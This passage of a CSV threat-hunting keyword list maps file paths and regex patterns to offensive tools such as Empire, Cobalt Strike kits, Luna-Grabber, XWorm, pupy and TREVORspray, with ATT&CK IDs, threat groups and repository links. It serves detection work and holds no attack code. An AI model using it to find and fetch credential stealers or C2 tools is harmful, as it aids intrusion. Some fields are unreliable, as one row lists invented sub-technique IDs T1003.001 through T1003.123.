Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","12032" "*/tools/obfuscation.py -i *",".{0,1000}\/tools\/obfuscation\.py\s\-i\s.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","#linux","N/A","10","","N/A","","","","12033" "*/tools/psexec.rb*",".{0,1000}\/tools\/psexec\.rb.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - 
FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-PsExec.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","12034" "*/Tools/ResHacker.exe*",".{0,1000}\/Tools\/ResHacker\.exe.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","false positive risk","6","","N/A","","","","12035" "*/Tools/spoolsystem/*",".{0,1000}\/Tools\/spoolsystem\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - 
Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","12036" "*/Tools/Squeak/Squeak*",".{0,1000}\/Tools\/Squeak\/Squeak.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard 
Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","12037" "*/toolsdownload/iepv.zip*",".{0,1000}\/toolsdownload\/iepv\.zip.{0,1000}","offensive_tool_keyword","IEPassView","IE PassView scans all Internet Explorer passwords in your system and display them on the main window.","T1555 - T1212","TA0006","N/A","BlackSuit - Royal - GoGoogle - XDSpy","Credential Access","https://www.nirsoft.net/utils/internet_explorer_password.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","12038" "*/toolsdownload/rdpv.zip*",".{0,1000}\/toolsdownload\/rdpv\.zip.{0,1000}","offensive_tool_keyword","rdpv","RemoteDesktopPassView is a small utility that reveals the password stored by Microsoft Remote Desktop Connection utility inside the .rdp files.","T1110 - T1560.001 - T1555.003 - T1212","TA0006 - TA0007","N/A","Phobos - GoGoogle - Kimsuky","Credential Access","https://www.nirsoft.net/utils/remote_desktop_password.html","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A","12039" "*/Tool-X.git*",".{0,1000}\/Tool\-X\.git.{0,1000}","offensive_tool_keyword","Tool-X","Tool-X is a Kali Linux hacking tools installer for Termux and linux system. Tool-X was developed for Termux and linux based systems. Using Tool-X you can install almost 370+ hacking tools in Termux (android) and other Linux based distributions. 
Now Tool-X is available for Ubuntu Debian etc.","T1212 - T1566 - T1550 - T1133","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/rajkumardusad/Tool-X","1","1","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12040" "*/top_mots_combo.7z*",".{0,1000}\/top_mots_combo\.7z.{0,1000}","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","N/A","3","280","45","2025-04-22T14:34:10Z","2020-10-21T14:37:53Z","12041" "*/top-usernames-shortlist.txt*",".{0,1000}\/top\-usernames\-shortlist\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","12042" "*/tor -mindepth 1 -maxdepth 1 -type f *",".{0,1000}\/tor\s\-mindepth\s1\s\-maxdepth\s1\s\-type\sf\s.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","12043" "*/tor/torrc*",".{0,1000}\/tor\/torrc.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. 
Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","12044" "*/tor-0.*.tar.gz*",".{0,1000}\/tor\-0\..{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12045" "*/Tor2web-*.tar.gz*",".{0,1000}\/Tor2web\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","12046" "*/Tor2web-*.zip*",".{0,1000}\/Tor2web\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","12047" "*/tor2web.conf*",".{0,1000}\/tor2web\.conf.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","#linux","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","12048" 
"*/Tor2web.git*",".{0,1000}\/Tor2web\.git.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","12049" "*/tor2web.js*",".{0,1000}\/tor2web\.js.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","12050" "*/tor-archive-keyring*",".{0,1000}\/tor\-archive\-keyring.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","12051" "*/ToRat.git*",".{0,1000}\/ToRat\.git.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","1","N/A","N/A","10","10","995","199","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z","12052" "*/torbrowser-install-*.exe *",".{0,1000}\/torbrowser\-install\-.{0,1000}\.exe\s\s.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. 
Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","0","#linux","N/A","9","10","N/A","N/A","N/A","N/A","12053" "*/tor-browser-linux*.*",".{0,1000}\/tor\-browser\-linux.{0,1000}\..{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","1","#linux","N/A","9","10","N/A","N/A","N/A","N/A","12054" "*/tor-browser-osx64*.*",".{0,1000}\/tor\-browser\-osx64.{0,1000}\..{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","12055" "*/tor-browser-win32*.*",".{0,1000}\/tor\-browser\-win32.{0,1000}\..{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","12056" "*/tor-browser-win64*.*",".{0,1000}\/tor\-browser\-win64.{0,1000}\..{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. 
Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","12057" "*/tor-consensus-checker.nse*",".{0,1000}\/tor\-consensus\-checker\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12058" "*/tor-gencert.exe*",".{0,1000}\/tor\-gencert\.exe.{0,1000}","offensive_tool_keyword","tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0005 - TA0010 - TA0011","N/A","Dispossessor - APT28 - APT29 - Leviathan","Defense Evasion","https://github.com/r0oth3x49/Tor","1","1","#linux","N/A","N/A","2","156","42","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z","12059" "*/tor-geoipdb.list*",".{0,1000}\/tor\-geoipdb\.list.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","12060" "*/tor-package-archive/*",".{0,1000}\/tor\-package\-archive\/.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. 
Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","12061" "*/torsocks.conf",".{0,1000}\/torsocks\.conf","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","12062" "*/torsocks.list*",".{0,1000}\/torsocks\.list.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. 
Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","12063" "*/tor-static-windows-amd64.zip*",".{0,1000}\/tor\-static\-windows\-amd64\.zip.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","1","N/A","N/A","10","10","995","199","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z","12064" "*/TotalRecall.git*",".{0,1000}\/TotalRecall\.git.{0,1000}","offensive_tool_keyword","TotalRecall","extracts and displays data from the Recall feature in Windows 11","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/xaitax/TotalRecall","1","1","N/A","N/A","10","10","2011","159","2024-06-08T09:25:08Z","2024-06-03T16:38:04Z","12065" "*/totalrecall.py*",".{0,1000}\/totalrecall\.py.{0,1000}","offensive_tool_keyword","TotalRecall","extracts and displays data from the Recall feature in Windows 11","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/xaitax/TotalRecall","1","1","N/A","N/A","10","10","2011","159","2024-06-08T09:25:08Z","2024-06-03T16:38:04Z","12066" "*/TotalRecall.txt*",".{0,1000}\/TotalRecall\.txt.{0,1000}","offensive_tool_keyword","TotalRecall","extracts and displays data from the Recall feature in Windows 11","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/xaitax/TotalRecall","1","0","#linux","N/A","10","10","2011","159","2024-06-08T09:25:08Z","2024-06-03T16:38:04Z","12067" 
"*/toteslegit.ps1*",".{0,1000}\/toteslegit\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","12068" "*/traceroute-geolocation.nse*",".{0,1000}\/traceroute\-geolocation\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12069" "*/tracers_fuzzer.cc*",".{0,1000}\/tracers_fuzzer\.cc.{0,1000}","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","0","N/A","N/A","7","8","752","109","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z","12070" "*/trackerjacker*",".{0,1000}\/trackerjacker.{0,1000}","offensive_tool_keyword","trackerjacker","Like nmap for mapping wifi networks you're not connected to. 
Maps and tracks wifi networks and devices through raw 802.11 monitoring.","T1040 - T1018 - T1591","TA0007 - - TA0043","N/A","N/A","Discovery","https://github.com/calebmadrigal/trackerjacker","1","0","#linux","N/A","N/A","10","2672","190","2024-01-16T05:10:22Z","2016-12-18T22:01:13Z","12071" "*/Trackflaw/CVE*.py*",".{0,1000}\/Trackflaw\/CVE.{0,1000}\.py.{0,1000}","offensive_tool_keyword","poc","Simple and dirty PoC of the CVE-2023-23397 vulnerability impacting the Outlook thick client.","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","APT28 - STRONTIUM - Sednit - Sofacy - Fancy Bear","Exploitation tool","https://github.com/Trackflaw/CVE-2023-23397","1","1","N/A","N/A","N/A","2","123","26","2023-03-24T10:46:38Z","2023-03-20T16:31:54Z","12072" "*/traitor/pkg/backdoor*",".{0,1000}\/traitor\/pkg\/backdoor.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","12073" "*/traitor/releases/download/*",".{0,1000}\/traitor\/releases\/download\/.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","12074" "*/traitor-386*",".{0,1000}\/traitor\-386.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","12075" "*/traitor-amd64*",".{0,1000}\/traitor\-amd64.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","12076" "*/traitor-arm64*",".{0,1000}\/traitor\-arm64.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","12077" "*/transports/scramblesuit/*.py*",".{0,1000}\/transports\/scramblesuit\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting 
Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","12078" "*/trap_command.py*",".{0,1000}\/trap_command\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","12079" "*/TreeWalker.cs*",".{0,1000}\/TreeWalker\.cs.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 
- T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","N/A","10","2341","232","2025-04-03T04:19:29Z","2020-03-30T07:03:47Z","12080" "*/TREVORspray.git*",".{0,1000}\/TREVORspray\.git.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","N/A","10","10","1156","154","2025-03-11T13:58:24Z","2020-09-06T23:02:37Z","12081" "*/trevorspray.log*",".{0,1000}\/trevorspray\.log.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","#logfile","N/A","10","10","1156","154","2025-03-11T13:58:24Z","2020-09-06T23:02:37Z","12082" "*/trganda/CVE-2022-23131*",".{0,1000}\/trganda\/CVE\-2022\-23131.{0,1000}","offensive_tool_keyword","POC","POC exploitation of zabbix saml bypass exp vulnerability 